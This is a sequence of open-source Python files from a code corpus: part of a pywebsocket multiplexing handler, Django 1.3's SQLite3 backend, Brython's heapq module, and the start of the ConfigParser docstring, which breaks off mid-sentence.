block.channel_id, status=common.HTTP_STATUS_BAD_REQUEST)
def _process_flow_control(self, block):
try:
self._logical_channels_condition.acquire()
            if block.channel_id not in self._logical_channels:
return
channel_data = self._logical_channels[block.channel_id]
channel_data.request.ws_stream.replenish_send_quota(
block.send_quota)
finally:
self._logical_channels_condition.release()
def _process_drop_channel(self, block):
self._logger.debug(
'DropChannel received for %d: code=%r, reason=%r' %
(block.channel_id, block.drop_code, block.drop_message))
try:
self._logical_channels_condition.acquire()
            if block.channel_id not in self._logical_channels:
return
channel_data = self._logical_channels[block.channel_id]
channel_data.drop_code = _DROP_CODE_ACKNOWLEDGED
# Close the logical channel
channel_data.request.connection.set_read_state(
_LogicalConnection.STATE_TERMINATED)
channel_data.request.ws_stream.stop_sending()
finally:
self._logical_channels_condition.release()
def _process_control_blocks(self, parser):
for control_block in parser.read_control_blocks():
opcode = control_block.opcode
self._logger.debug('control block received, opcode: %d' % opcode)
if opcode == _MUX_OPCODE_ADD_CHANNEL_REQUEST:
self._process_add_channel_request(control_block)
elif opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Received AddChannelResponse')
elif opcode == _MUX_OPCODE_FLOW_CONTROL:
self._process_flow_control(control_block)
elif opcode == _MUX_OPCODE_DROP_CHANNEL:
self._process_drop_channel(control_block)
elif opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Received NewChannelSlot')
else:
raise MuxUnexpectedException(
'Unexpected opcode %r' % opcode)
def _process_logical_frame(self, channel_id, parser):
self._logger.debug('Received a frame. channel id=%d' % channel_id)
try:
self._logical_channels_condition.acquire()
            if channel_id not in self._logical_channels:
# We must ignore the message for an inactive channel.
return
channel_data = self._logical_channels[channel_id]
fin, rsv1, rsv2, rsv3, opcode, payload = parser.read_inner_frame()
consuming_byte = len(payload)
if opcode != common.OPCODE_CONTINUATION:
consuming_byte += 1
if not channel_data.request.ws_stream.consume_receive_quota(
consuming_byte):
# The client violates quota. Close logical channel.
raise LogicalChannelError(
channel_id, _DROP_CODE_SEND_QUOTA_VIOLATION)
header = create_header(opcode, len(payload), fin, rsv1, rsv2, rsv3,
mask=False)
frame_data = header + payload
channel_data.request.connection.append_frame_data(frame_data)
finally:
self._logical_channels_condition.release()
def dispatch_message(self, message):
"""Dispatches message. The reader thread calls this method.
Args:
            message: a message that contains an encapsulated frame.
Raises:
PhysicalConnectionError: if the message contains physical
connection level errors.
LogicalChannelError: if the message contains logical channel
level errors.
"""
parser = _MuxFramePayloadParser(message)
try:
channel_id = parser.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_CHANNEL_ID_TRUNCATED)
if channel_id == _CONTROL_CHANNEL_ID:
self._process_control_blocks(parser)
else:
self._process_logical_frame(channel_id, parser)
def notify_worker_done(self, channel_id):
"""Called when a worker has finished.
Args:
channel_id: channel id corresponded with the worker.
"""
self._logger.debug('Worker for channel id %d terminated' % channel_id)
try:
self._logical_channels_condition.acquire()
            if channel_id not in self._logical_channels:
raise MuxUnexpectedException(
'Channel id %d not found' % channel_id)
channel_data = self._logical_channels.pop(channel_id)
finally:
self._worker_done_notify_received = True
self._logical_channels_condition.notify()
self._logical_channels_condition.release()
if not channel_data.request.server_terminated:
self._send_drop_channel(
channel_id, code=channel_data.drop_code,
message=channel_data.drop_message)
def notify_reader_done(self):
"""This method is called by the reader thread when the reader has
finished.
"""
self._logger.debug(
            'Terminating all logical connections waiting for incoming data '
'...')
self._logical_channels_condition.acquire()
for channel_data in self._logical_channels.values():
try:
channel_data.request.connection.set_read_state(
_LogicalConnection.STATE_TERMINATED)
except Exception:
self._logger.debug(traceback.format_exc())
self._logical_channels_condition.release()
def notify_writer_done(self):
"""This method is called by the writer thread when the writer has
finished.
"""
self._logger.debug(
            'Terminating all logical connections waiting for write '
'completion ...')
self._logical_channels_condition.acquire()
for channel_data in self._logical_channels.values():
try:
channel_data.request.connection.on_writer_done()
except Exception:
self._logger.debug(traceback.format_exc())
self._logical_channels_condition.release()
def fail_physical_connection(self, code, message):
"""Fail the physical connection.
Args:
code: drop reason code.
message: drop message.
"""
self._logger.debug('Failing the physical connection...')
self._send_drop_channel(_CONTROL_CHANNEL_ID, code, message)
self._writer.stop(common.STATUS_INTERNAL_ENDPOINT_ERROR)
def fail_logical_channel(self, channel_id, code, message):
"""Fail a logical channel.
Args:
channel_id: channel id.
code: drop reason code.
message: drop message.
"""
self._logger.debug('Failing logical channel %d...' % channel_id)
try:
self._logical_channels_condition.acquire()
if channel_id in self._logical_channels:
channel_data = self._logical_channels[channel_id]
# Close the logical channel. notify_worker_done() will be
# called later and it will send DropChannel.
channel_data.drop_code = code
channel_data.drop_message = message
channel_data.request.connection.set_read_state(
_LogicalConnection.STATE_TERMINATED)
channel_data.request.ws_stream.stop_sending()
else:
self._send_drop_channel(channel_id, code, message)
finally:
self._logical_channels_condition.release()
def use_mux(request):
return hasattr(request, 'mux_processor') and (
request.mux_processor.is_active())
def start(request, dispatcher):
mux_handler = _MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(_INITIAL_NUMBER_OF_CHANNEL_SLOTS,
_INITIAL_QUOTA_FOR_CLIENT)
mux_handler.wait_until_done()
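# Typical entry point sketch (assuming the pywebsocket dispatch flow; the
# exact call site is dispatcher-specific):
#
#     if use_mux(request):
#         start(request, dispatcher)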
# vi:sts=4 sw=4 et
| mpl-2.0 |
dvliman/jaikuengine | .google_appengine/lib/django-1.3/django/db/backends/sqlite3/base.py | 32 | 12204 | """
SQLite3 backend for django.
Python 2.4 requires pysqlite2 (http://pysqlite.org/).
Python 2.5 and later can use a pysqlite2 module or the sqlite3 module in the
standard library.
"""
import re
import sys
import datetime
from django.db import utils
from django.db.backends import *
from django.db.backends.signals import connection_created
from django.db.backends.sqlite3.client import DatabaseClient
from django.db.backends.sqlite3.creation import DatabaseCreation
from django.db.backends.sqlite3.introspection import DatabaseIntrospection
from django.utils.safestring import SafeString
try:
try:
from pysqlite2 import dbapi2 as Database
except ImportError, e1:
from sqlite3 import dbapi2 as Database
except ImportError, exc:
import sys
from django.core.exceptions import ImproperlyConfigured
if sys.version_info < (2, 5, 0):
module = 'pysqlite2 module'
exc = e1
else:
module = 'either pysqlite2 or sqlite3 modules (tried in that order)'
raise ImproperlyConfigured("Error loading %s: %s" % (module, exc))
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
Database.register_converter("bool", lambda s: str(s) == '1')
Database.register_converter("time", util.typecast_time)
Database.register_converter("date", util.typecast_date)
Database.register_converter("datetime", util.typecast_timestamp)
Database.register_converter("timestamp", util.typecast_timestamp)
Database.register_converter("TIMESTAMP", util.typecast_timestamp)
Database.register_converter("decimal", util.typecast_decimal)
Database.register_adapter(decimal.Decimal, util.rev_typecast_decimal)
if Database.version_info >= (2,4,1):
# Starting in 2.4.1, the str type is not accepted anymore, therefore,
# we convert all str objects to Unicode
    # As registering an adapter for a primitive type causes a small
# slow-down, this adapter is only registered for sqlite3 versions
# needing it.
Database.register_adapter(str, lambda s:s.decode('utf-8'))
Database.register_adapter(SafeString, lambda s:s.decode('utf-8'))
class DatabaseFeatures(BaseDatabaseFeatures):
# SQLite cannot handle us only partially reading from a cursor's result set
# and then writing the same rows to the database in another cursor. This
# setting ensures we always read result sets fully into memory all in one
# go.
can_use_chunked_reads = False
test_db_allows_multiple_connections = False
supports_unspecified_pk = True
supports_1000_query_parameters = False
supports_mixed_date_datetime_comparisons = False
def _supports_stddev(self):
"""Confirm support for STDDEV and related stats functions
SQLite supports STDDEV as an extension package; so
connection.ops.check_aggregate_support() can't unilaterally
rule out support for STDDEV. We need to manually check
whether the call works.
"""
cursor = self.connection.cursor()
cursor.execute('CREATE TABLE STDDEV_TEST (X INT)')
try:
cursor.execute('SELECT STDDEV(*) FROM STDDEV_TEST')
has_support = True
except utils.DatabaseError:
has_support = False
cursor.execute('DROP TABLE STDDEV_TEST')
return has_support
class DatabaseOperations(BaseDatabaseOperations):
def date_extract_sql(self, lookup_type, field_name):
# sqlite doesn't support extract, so we fake it with the user-defined
# function django_extract that's registered in connect(). Note that
# single quotes are used because this is a string (and could otherwise
# cause a collision with a field name).
return "django_extract('%s', %s)" % (lookup_type.lower(), field_name)
def date_interval_sql(self, sql, connector, timedelta):
# It would be more straightforward if we could use the sqlite strftime
# function, but it does not allow for keeping six digits of fractional
# second information, nor does it allow for formatting date and datetime
# values differently. So instead we register our own function that
# formats the datetime combined with the delta in a manner suitable
# for comparisons.
return u'django_format_dtdelta(%s, "%s", "%d", "%d", "%d")' % (sql,
connector, timedelta.days, timedelta.seconds, timedelta.microseconds)
def date_trunc_sql(self, lookup_type, field_name):
# sqlite doesn't support DATE_TRUNC, so we fake it with a user-defined
# function django_date_trunc that's registered in connect(). Note that
# single quotes are used because this is a string (and could otherwise
# cause a collision with a field name).
return "django_date_trunc('%s', %s)" % (lookup_type.lower(), field_name)
def drop_foreignkey_sql(self):
return ""
def pk_default_value(self):
return 'NULL'
def quote_name(self, name):
if name.startswith('"') and name.endswith('"'):
return name # Quoting once is enough.
return '"%s"' % name
def no_limit_value(self):
return -1
def sql_flush(self, style, tables, sequences):
# NB: The generated SQL below is specific to SQLite
# Note: The DELETE FROM... SQL generated below works for SQLite databases
# because constraints don't exist
sql = ['%s %s %s;' % \
(style.SQL_KEYWORD('DELETE'),
style.SQL_KEYWORD('FROM'),
style.SQL_FIELD(self.quote_name(table))
) for table in tables]
# Note: No requirement for reset of auto-incremented indices (cf. other
# sql_flush() implementations). Just return SQL at this point
return sql
def year_lookup_bounds(self, value):
first = '%s-01-01'
second = '%s-12-31 23:59:59.999999'
return [first % value, second % value]
def convert_values(self, value, field):
"""SQLite returns floats when it should be returning decimals,
and gets dates and datetimes wrong.
For consistency with other backends, coerce when required.
"""
internal_type = field.get_internal_type()
if internal_type == 'DecimalField':
return util.typecast_decimal(field.format_number(value))
elif internal_type and internal_type.endswith('IntegerField') or internal_type == 'AutoField':
return int(value)
elif internal_type == 'DateField':
return util.typecast_date(value)
elif internal_type == 'DateTimeField':
return util.typecast_timestamp(value)
elif internal_type == 'TimeField':
return util.typecast_time(value)
# No field, or the field isn't known to be a decimal or integer
return value
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'sqlite'
# SQLite requires LIKE statements to include an ESCAPE clause if the value
# being escaped has a percent or underscore in it.
# See http://www.sqlite.org/lang_expr.html for an explanation.
operators = {
'exact': '= %s',
'iexact': "LIKE %s ESCAPE '\\'",
'contains': "LIKE %s ESCAPE '\\'",
'icontains': "LIKE %s ESCAPE '\\'",
'regex': 'REGEXP %s',
'iregex': "REGEXP '(?i)' || %s",
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': "LIKE %s ESCAPE '\\'",
'endswith': "LIKE %s ESCAPE '\\'",
'istartswith': "LIKE %s ESCAPE '\\'",
'iendswith': "LIKE %s ESCAPE '\\'",
}
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
self.ops = DatabaseOperations()
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = BaseDatabaseValidation(self)
def _cursor(self):
if self.connection is None:
settings_dict = self.settings_dict
if not settings_dict['NAME']:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Please fill out the database NAME in the settings module before using the database.")
kwargs = {
'database': settings_dict['NAME'],
'detect_types': Database.PARSE_DECLTYPES | Database.PARSE_COLNAMES,
}
kwargs.update(settings_dict['OPTIONS'])
self.connection = Database.connect(**kwargs)
# Register extract, date_trunc, and regexp functions.
self.connection.create_function("django_extract", 2, _sqlite_extract)
self.connection.create_function("django_date_trunc", 2, _sqlite_date_trunc)
self.connection.create_function("regexp", 2, _sqlite_regexp)
self.connection.create_function("django_format_dtdelta", 5, _sqlite_format_dtdelta)
connection_created.send(sender=self.__class__, connection=self)
return self.connection.cursor(factory=SQLiteCursorWrapper)
def close(self):
# If database is in memory, closing the connection destroys the
# database. To prevent accidental data loss, ignore close requests on
# an in-memory db.
if self.settings_dict['NAME'] != ":memory:":
BaseDatabaseWrapper.close(self)
FORMAT_QMARK_REGEX = re.compile(r'(?<!%)%s')
class SQLiteCursorWrapper(Database.Cursor):
"""
Django uses "format" style placeholders, but pysqlite2 uses "qmark" style.
This fixes it -- but note that if you want to use a literal "%s" in a query,
you'll need to use "%%s".
"""
def execute(self, query, params=()):
query = self.convert_query(query)
try:
return Database.Cursor.execute(self, query, params)
except Database.IntegrityError, e:
raise utils.IntegrityError, utils.IntegrityError(*tuple(e)), sys.exc_info()[2]
except Database.DatabaseError, e:
raise utils.DatabaseError, utils.DatabaseError(*tuple(e)), sys.exc_info()[2]
def executemany(self, query, param_list):
query = self.convert_query(query)
try:
return Database.Cursor.executemany(self, query, param_list)
except Database.IntegrityError, e:
raise utils.IntegrityError, utils.IntegrityError(*tuple(e)), sys.exc_info()[2]
except Database.DatabaseError, e:
raise utils.DatabaseError, utils.DatabaseError(*tuple(e)), sys.exc_info()[2]
def convert_query(self, query):
return FORMAT_QMARK_REGEX.sub('?', query).replace('%%','%')
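# Illustrative conversion (hypothetical query): convert_query(
# "SELECT * FROM t WHERE a = %s AND b LIKE '100%%'") returns
# "SELECT * FROM t WHERE a = ? AND b LIKE '100%'".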
def _sqlite_extract(lookup_type, dt):
if dt is None:
return None
try:
dt = util.typecast_timestamp(dt)
except (ValueError, TypeError):
return None
if lookup_type == 'week_day':
return (dt.isoweekday() % 7) + 1
else:
return getattr(dt, lookup_type)
def _sqlite_date_trunc(lookup_type, dt):
try:
dt = util.typecast_timestamp(dt)
except (ValueError, TypeError):
return None
if lookup_type == 'year':
return "%i-01-01 00:00:00" % dt.year
elif lookup_type == 'month':
return "%i-%02i-01 00:00:00" % (dt.year, dt.month)
elif lookup_type == 'day':
return "%i-%02i-%02i 00:00:00" % (dt.year, dt.month, dt.day)
def _sqlite_format_dtdelta(dt, conn, days, secs, usecs):
try:
dt = util.typecast_timestamp(dt)
delta = datetime.timedelta(int(days), int(secs), int(usecs))
if conn.strip() == '+':
dt = dt + delta
else:
dt = dt - delta
except (ValueError, TypeError):
return None
if isinstance(dt, datetime.datetime):
rv = dt.strftime("%Y-%m-%d %H:%M:%S")
if dt.microsecond:
rv = "%s.%0.6d" % (rv, dt.microsecond)
else:
rv = dt.strftime("%Y-%m-%d")
return rv
def _sqlite_regexp(re_pattern, re_string):
import re
try:
return bool(re.search(re_pattern, re_string))
except:
return False
| apache-2.0 |
40223139/203739test | static/Brython3.1.0-20150301-090019/Lib/heapq.py | 628 | 18065 | """Heap queue algorithm (a.k.a. priority queue).
Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for
all k, counting elements from 0. For the sake of comparison,
non-existing elements are considered to be infinite. The interesting
property of a heap is that a[0] is always its smallest element.
Usage:
heap = [] # creates an empty heap
heappush(heap, item) # pushes a new item on the heap
item = heappop(heap) # pops the smallest item from the heap
item = heap[0] # smallest item on the heap without popping it
heapify(x) # transforms list into a heap, in-place, in linear time
item = heapreplace(heap, item) # pops and returns smallest item, and adds
# new item; the heap size is unchanged
Our API differs from textbook heap algorithms as follows:
- We use 0-based indexing. This makes the relationship between the
index for a node and the indexes for its children slightly less
obvious, but is more suitable since Python uses 0-based indexing.
- Our heappop() method returns the smallest item, not the largest.
These two make it possible to view the heap as a regular Python list
without surprises: heap[0] is the smallest item, and heap.sort()
maintains the heap invariant!
"""
# Original code by Kevin O'Connor, augmented by Tim Peters and Raymond Hettinger
__about__ = """Heap queues
[explanation by François Pinard]
Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for
all k, counting elements from 0. For the sake of comparison,
non-existing elements are considered to be infinite. The interesting
property of a heap is that a[0] is always its smallest element.
The strange invariant above is meant to be an efficient memory
representation for a tournament. The numbers below are `k', not a[k]:
0
1 2
3 4 5 6
7 8 9 10 11 12 13 14
15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
In the tree above, each cell `k' is topping `2*k+1' and `2*k+2'. In
a usual binary tournament we see in sports, each cell is the winner
over the two cells it tops, and we can trace the winner down the tree
to see all opponents s/he had. However, in many computer applications
of such tournaments, we do not need to trace the history of a winner.
To be more memory efficient, when a winner is promoted, we try to
replace it by something else at a lower level, and the rule becomes
that a cell and the two cells it tops contain three different items,
but the top cell "wins" over the two topped cells.
If this heap invariant is protected at all time, index 0 is clearly
the overall winner. The simplest algorithmic way to remove it and
find the "next" winner is to move some loser (let's say cell 30 in the
diagram above) into the 0 position, and then percolate this new 0 down
the tree, exchanging values, until the invariant is re-established.
This is clearly logarithmic on the total number of items in the tree.
By iterating over all items, you get an O(n ln n) sort.
A nice feature of this sort is that you can efficiently insert new
items while the sort is going on, provided that the inserted items are
not "better" than the last 0'th element you extracted. This is
especially useful in simulation contexts, where the tree holds all
incoming events, and the "win" condition means the smallest scheduled
time. When an event schedules other events for execution, they are
scheduled into the future, so they can easily go into the heap. So, a
heap is a good structure for implementing schedulers (this is what I
used for my MIDI sequencer :-).
Various structures for implementing schedulers have been extensively
studied, and heaps are good for this, as they are reasonably speedy,
the speed is almost constant, and the worst case is not much different
than the average case. However, there are other representations which
are more efficient overall, yet the worst cases might be terrible.
Heaps are also very useful in big disk sorts. You most probably all
know that a big sort implies producing "runs" (which are pre-sorted
sequences, which size is usually related to the amount of CPU memory),
followed by merging passes for these runs, and this merging is often
very cleverly organised[1]. It is very important that the initial
sort produces the longest runs possible. Tournaments are a good way
to achieve that. If, using all the memory available to hold a tournament, you
replace and percolate items that happen to fit the current run, you'll
produce runs which are twice the size of the memory for random input,
and much better for input fuzzily ordered.
Moreover, if you output the 0'th item on disk and get an input which
may not fit in the current tournament (because the value "wins" over
the last output value), it cannot fit in the heap, so the size of the
heap decreases. The freed memory could be cleverly reused immediately
for progressively building a second heap, which grows at exactly the
same rate the first heap is melting. When the first heap completely
vanishes, you switch heaps and start a new run. Clever and quite
effective!
In a word, heaps are useful memory structures to know. I use them in
a few applications, and I think it is good to keep a `heap' module
around. :-)
--------------------
[1] The disk balancing algorithms which are current, nowadays, are
more annoying than clever, and this is a consequence of the seeking
capabilities of the disks. On devices which cannot seek, like big
tape drives, the story was quite different, and one had to be very
clever to ensure (far in advance) that each tape movement will be the
most effective possible (that is, will best participate at
"progressing" the merge). Some tapes were even able to read
backwards, and this was also used to avoid the rewinding time.
Believe me, real good tape sorts were quite spectacular to watch!
From all times, sorting has always been a Great Art! :-)
"""
__all__ = ['heappush', 'heappop', 'heapify', 'heapreplace', 'merge',
'nlargest', 'nsmallest', 'heappushpop']
from itertools import islice, count, tee, chain
def heappush(heap, item):
"""Push item onto heap, maintaining the heap invariant."""
heap.append(item)
_siftdown(heap, 0, len(heap)-1)
def heappop(heap):
"""Pop the smallest item off the heap, maintaining the heap invariant."""
lastelt = heap.pop() # raises appropriate IndexError if heap is empty
if heap:
returnitem = heap[0]
heap[0] = lastelt
_siftup(heap, 0)
else:
returnitem = lastelt
return returnitem
def heapreplace(heap, item):
"""Pop and return the current smallest value, and add the new item.
This is more efficient than heappop() followed by heappush(), and can be
more appropriate when using a fixed-size heap. Note that the value
returned may be larger than item! That constrains reasonable uses of
this routine unless written as part of a conditional replacement:
if item > heap[0]:
item = heapreplace(heap, item)
"""
returnitem = heap[0] # raises appropriate IndexError if heap is empty
heap[0] = item
_siftup(heap, 0)
return returnitem
def heappushpop(heap, item):
"""Fast version of a heappush followed by a heappop."""
if heap and heap[0] < item:
item, heap[0] = heap[0], item
_siftup(heap, 0)
return item
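# For example: heappushpop([1, 3, 5], 2) returns 1 and leaves the heap as
# [2, 3, 5], while heappushpop([1, 3, 5], 0) returns 0 and leaves the heap
# unchanged.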
def heapify(x):
"""Transform list into a heap, in-place, in O(len(x)) time."""
n = len(x)
# Transform bottom-up. The largest index there's any point to looking at
# is the largest with a child index in-range, so must have 2*i + 1 < n,
# or i < (n-1)/2. If n is even = 2*j, this is (2*j-1)/2 = j-1/2 so
# j-1 is the largest, which is n//2 - 1. If n is odd = 2*j+1, this is
# (2*j+1-1)/2 = j so j-1 is the largest, and that's again n//2-1.
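    # For example, with n = 10 the last parent is index n//2 - 1 = 4;
    # indices 5 through 9 are leaves and therefore already trivial heaps.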
for i in reversed(range(n//2)):
_siftup(x, i)
def _heappushpop_max(heap, item):
"""Maxheap version of a heappush followed by a heappop."""
if heap and item < heap[0]:
item, heap[0] = heap[0], item
_siftup_max(heap, 0)
return item
def _heapify_max(x):
"""Transform list into a maxheap, in-place, in O(len(x)) time."""
n = len(x)
for i in reversed(range(n//2)):
_siftup_max(x, i)
def nlargest(n, iterable):
"""Find the n largest elements in a dataset.
Equivalent to: sorted(iterable, reverse=True)[:n]
"""
if n < 0:
return []
it = iter(iterable)
result = list(islice(it, n))
if not result:
return result
heapify(result)
_heappushpop = heappushpop
for elem in it:
_heappushpop(result, elem)
result.sort(reverse=True)
return result
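# For example: nlargest(3, [1, 8, 2, 23, 7, -4]) == [23, 8, 7].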
def nsmallest(n, iterable):
"""Find the n smallest elements in a dataset.
Equivalent to: sorted(iterable)[:n]
"""
if n < 0:
return []
it = iter(iterable)
result = list(islice(it, n))
if not result:
return result
_heapify_max(result)
_heappushpop = _heappushpop_max
for elem in it:
_heappushpop(result, elem)
result.sort()
return result
# 'heap' is a heap at all indices >= startpos, except possibly for pos. pos
# is the index of a leaf with a possibly out-of-order value. Restore the
# heap invariant.
def _siftdown(heap, startpos, pos):
newitem = heap[pos]
# Follow the path to the root, moving parents down until finding a place
# newitem fits.
while pos > startpos:
parentpos = (pos - 1) >> 1
parent = heap[parentpos]
if newitem < parent:
heap[pos] = parent
pos = parentpos
continue
break
heap[pos] = newitem
# The child indices of heap index pos are already heaps, and we want to make
# a heap at index pos too. We do this by bubbling the smaller child of
# pos up (and so on with that child's children, etc) until hitting a leaf,
# then using _siftdown to move the oddball originally at index pos into place.
#
# We *could* break out of the loop as soon as we find a pos where newitem <=
# both its children, but turns out that's not a good idea, and despite that
# many books write the algorithm that way. During a heap pop, the last array
# element is sifted in, and that tends to be large, so that comparing it
# against values starting from the root usually doesn't pay (= usually doesn't
# get us out of the loop early). See Knuth, Volume 3, where this is
# explained and quantified in an exercise.
#
# Cutting the # of comparisons is important, since these routines have no
# way to extract "the priority" from an array element, so that intelligence
# is likely to be hiding in custom comparison methods, or in array elements
# storing (priority, record) tuples. Comparisons are thus potentially
# expensive.
#
# On random arrays of length 1000, making this change cut the number of
# comparisons made by heapify() a little, and those made by exhaustive
# heappop() a lot, in accord with theory. Here are typical results from 3
# runs (3 just to demonstrate how small the variance is):
#
# Compares needed by heapify Compares needed by 1000 heappops
# -------------------------- --------------------------------
# 1837 cut to 1663 14996 cut to 8680
# 1855 cut to 1659 14966 cut to 8678
# 1847 cut to 1660 15024 cut to 8703
#
# Building the heap by using heappush() 1000 times instead required
# 2198, 2148, and 2219 compares: heapify() is more efficient, when
# you can use it.
#
# The total compares needed by list.sort() on the same lists were 8627,
# 8627, and 8632 (this should be compared to the sum of heapify() and
# heappop() compares): list.sort() is (unsurprisingly!) more efficient
# for sorting.
def _siftup(heap, pos):
endpos = len(heap)
startpos = pos
newitem = heap[pos]
# Bubble up the smaller child until hitting a leaf.
childpos = 2*pos + 1 # leftmost child position
while childpos < endpos:
# Set childpos to index of smaller child.
rightpos = childpos + 1
if rightpos < endpos and not heap[childpos] < heap[rightpos]:
childpos = rightpos
# Move the smaller child up.
heap[pos] = heap[childpos]
pos = childpos
childpos = 2*pos + 1
# The leaf at pos is empty now. Put newitem there, and bubble it up
# to its final resting place (by sifting its parents down).
heap[pos] = newitem
_siftdown(heap, startpos, pos)
def _siftdown_max(heap, startpos, pos):
'Maxheap variant of _siftdown'
newitem = heap[pos]
# Follow the path to the root, moving parents down until finding a place
# newitem fits.
while pos > startpos:
parentpos = (pos - 1) >> 1
parent = heap[parentpos]
if parent < newitem:
heap[pos] = parent
pos = parentpos
continue
break
heap[pos] = newitem
def _siftup_max(heap, pos):
'Maxheap variant of _siftup'
endpos = len(heap)
startpos = pos
newitem = heap[pos]
# Bubble up the larger child until hitting a leaf.
childpos = 2*pos + 1 # leftmost child position
while childpos < endpos:
# Set childpos to index of larger child.
rightpos = childpos + 1
if rightpos < endpos and not heap[rightpos] < heap[childpos]:
childpos = rightpos
# Move the larger child up.
heap[pos] = heap[childpos]
pos = childpos
childpos = 2*pos + 1
# The leaf at pos is empty now. Put newitem there, and bubble it up
# to its final resting place (by sifting its parents down).
heap[pos] = newitem
_siftdown_max(heap, startpos, pos)
# If available, use C implementation
#_heapq does not exist in brython, so let's just comment it out.
#try:
# from _heapq import *
#except ImportError:
# pass
def merge(*iterables):
'''Merge multiple sorted inputs into a single sorted output.
Similar to sorted(itertools.chain(*iterables)) but returns a generator,
does not pull the data into memory all at once, and assumes that each of
the input streams is already sorted (smallest to largest).
>>> list(merge([1,3,5,7], [0,2,4,8], [5,10,15,20], [], [25]))
[0, 1, 2, 3, 4, 5, 5, 7, 8, 10, 15, 20, 25]
'''
_heappop, _heapreplace, _StopIteration = heappop, heapreplace, StopIteration
_len = len
h = []
h_append = h.append
for itnum, it in enumerate(map(iter, iterables)):
try:
next = it.__next__
h_append([next(), itnum, next])
except _StopIteration:
pass
heapify(h)
while _len(h) > 1:
try:
while True:
v, itnum, next = s = h[0]
yield v
s[0] = next() # raises StopIteration when exhausted
_heapreplace(h, s) # restore heap condition
except _StopIteration:
_heappop(h) # remove empty iterator
if h:
# fast case when only a single iterator remains
v, itnum, next = h[0]
yield v
yield from next.__self__
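# Illustrative sketch (an addition): merge() consumes lazy, already-sorted
# iterables without materialising them, so it also suits large inputs.
def _example_merge_ranges():
    streams = (range(0, 10, 3), range(1, 10, 3), range(2, 10, 3))
    return list(merge(*streams))   # -> [0, 1, 2, ..., 9]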
# Extend the implementations of nsmallest and nlargest to use a key= argument
_nsmallest = nsmallest
def nsmallest(n, iterable, key=None):
"""Find the n smallest elements in a dataset.
Equivalent to: sorted(iterable, key=key)[:n]
"""
# Short-cut for n==1 is to use min() when len(iterable)>0
if n == 1:
it = iter(iterable)
head = list(islice(it, 1))
if not head:
return []
if key is None:
return [min(chain(head, it))]
return [min(chain(head, it), key=key)]
# When n>=size, it's faster to use sorted()
try:
size = len(iterable)
except (TypeError, AttributeError):
pass
else:
if n >= size:
return sorted(iterable, key=key)[:n]
# When key is none, use simpler decoration
if key is None:
it = zip(iterable, count()) # decorate
result = _nsmallest(n, it)
return [r[0] for r in result] # undecorate
# General case, slowest method
in1, in2 = tee(iterable)
it = zip(map(key, in1), count(), in2) # decorate
result = _nsmallest(n, it)
return [r[2] for r in result] # undecorate
_nlargest = nlargest
def nlargest(n, iterable, key=None):
"""Find the n largest elements in a dataset.
Equivalent to: sorted(iterable, key=key, reverse=True)[:n]
"""
# Short-cut for n==1 is to use max() when len(iterable)>0
if n == 1:
it = iter(iterable)
head = list(islice(it, 1))
if not head:
return []
if key is None:
return [max(chain(head, it))]
return [max(chain(head, it), key=key)]
# When n>=size, it's faster to use sorted()
try:
size = len(iterable)
except (TypeError, AttributeError):
pass
else:
if n >= size:
return sorted(iterable, key=key, reverse=True)[:n]
# When key is none, use simpler decoration
if key is None:
it = zip(iterable, count(0,-1)) # decorate
result = _nlargest(n, it)
return [r[0] for r in result] # undecorate
# General case, slowest method
in1, in2 = tee(iterable)
it = zip(map(key, in1), count(0,-1), in2) # decorate
result = _nlargest(n, it)
return [r[2] for r in result] # undecorate
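# Hedged example (an addition): key= mirrors sorted(), e.g. picking the two
# longest words without sorting the whole input. Ties keep input order.
def _example_nlargest_key():
    return nlargest(2, ['pear', 'fig', 'banana', 'kiwi'], key=len)
    # -> ['banana', 'pear']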
if __name__ == "__main__":
# Simple sanity test
heap = []
data = [1, 3, 5, 7, 9, 2, 4, 6, 8, 0]
for item in data:
heappush(heap, item)
sort = []
while heap:
sort.append(heappop(heap))
print(sort)
import doctest
doctest.testmod()
| gpl-3.0 |
wang1352083/pythontool | python-2.7.12-lib/ConfigParser.py | 186 | 27746 | """Configuration file parser.
A setup file consists of sections, led by a "[section]" header,
and followed by "name: value" entries, with continuations and such in
the style of RFC 822.
The option values can contain format strings which refer to other values in
the same section, or values in a special [DEFAULT] section.
For example:
something: %(dir)s/whatever
would resolve the "%(dir)s" to the value of dir. All reference
expansions are done late, on demand.
Intrinsic defaults can be specified by passing them into the
ConfigParser constructor as a dictionary.
class:
ConfigParser -- responsible for parsing a list of
configuration files, and managing the parsed database.
methods:
__init__(defaults=None)
create the parser and specify a dictionary of intrinsic defaults. The
keys must be strings, the values must be appropriate for %()s string
interpolation. Note that `__name__' is always an intrinsic default;
its value is the section's name.
sections()
return all the configuration section names, sans DEFAULT
has_section(section)
return whether the given section exists
has_option(section, option)
return whether the given option exists in the given section
options(section)
return list of configuration options for the named section
read(filenames)
read and parse the list of named configuration files, given by
name. A single filename is also allowed. Non-existing files
are ignored. Return list of successfully read files.
readfp(fp, filename=None)
read and parse one configuration file, given as a file object.
The filename defaults to fp.name; it is only used in error
messages (if fp has no `name' attribute, the string `<???>' is used).
get(section, option, raw=False, vars=None)
return a string value for the named option. All % interpolations are
expanded in the return values, based on the defaults passed into the
constructor and the DEFAULT section. Additional substitutions may be
provided using the `vars' argument, which must be a dictionary whose
contents override any pre-existing defaults.
getint(section, options)
like get(), but convert value to an integer
getfloat(section, options)
like get(), but convert value to a float
getboolean(section, options)
like get(), but convert value to a boolean (currently case
